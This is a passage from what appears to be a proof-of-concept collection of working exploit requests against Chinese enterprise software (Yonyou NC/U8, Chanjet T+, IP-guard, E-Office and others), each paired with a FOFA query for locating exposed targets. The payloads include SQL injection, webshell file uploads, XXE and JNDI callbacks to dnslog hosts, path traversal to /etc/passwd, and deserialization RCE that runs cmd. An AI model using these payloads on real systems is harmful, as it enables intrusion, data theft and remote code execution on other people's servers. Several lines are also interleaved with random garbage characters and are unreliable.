' r! d6 l1 {+ a7 H "@type":"com.alibaba.fastjson.JSONObject",
6 f/ P" e2 q0 v {"@type":"java.net.URL","val":"http://DNSLOG"}: {1 L/ u$ D8 c8 ]9 ^8 v ]) B
}""6 K& w. a- a% E5 r @' k
}
4 Q$ |1 e& x2 t* _
: a" `5 M6 n5 A
24. 用友NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. 用友NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. 用友NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. 用友NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. 用友NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. 用友NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. 用友NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. 用友NC runStateServlet SQL injection
version <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. 用友NC complainbilldetail SQL injection
version = NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. 用友NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. 用友NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. 用友NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. 用友NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. 用友NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. 用友U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. 用友U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. 用友U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. 用友GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. 用友GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. 用友GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. 用友GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. 用友GRP A++Cloud 政府财务云 arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. 用友U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. 用友U8 CRM system uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空社会化商业 ERP 系统 validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

# h# K" \1 d4 T52. 泛微E-Office json_common.php sql注入
1 q; y1 y0 |1 aFOFA:app="泛微-EOffice"
$ R2 ^0 l" M q7 sPOST /building/json_common.php HTTP/1.1/ N5 y0 Z6 B b3 \+ R: D
Host: 192.168.86.128:8097) O9 w" w4 b+ t: C
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 ]" S9 `3 H9 @8 h0 }% b# S
Connection: close& s$ S2 D' p( o: Y5 q
Content-Length: 87
. X9 f. ]& M# b; X# G7 C( W# c9 o: cAccept: */*
' o) T% ]4 m0 F9 K$ A, H; r) a; tAccept-Language: en
* `5 x, A( K4 Z& mContent-Type: application/x-www-form-urlencoded6 l; d+ E8 N" X* }( ^: s S/ y% r
Accept-Encoding: gzip* i! U. [: o/ |* C8 l
2 e6 m8 F- n9 d7 ?8 V+ Ytfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333! J- J- l1 ]. P- ]6 r, u2 I, T
; c6 j+ o+ t4 u) o1 H6 t- v( H4 M% w3 N9 y+ P; g9 l: T& t5 o
53. 迪普 DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. 畅捷通T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the following request to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. 畅捷通T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. 畅捷通T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

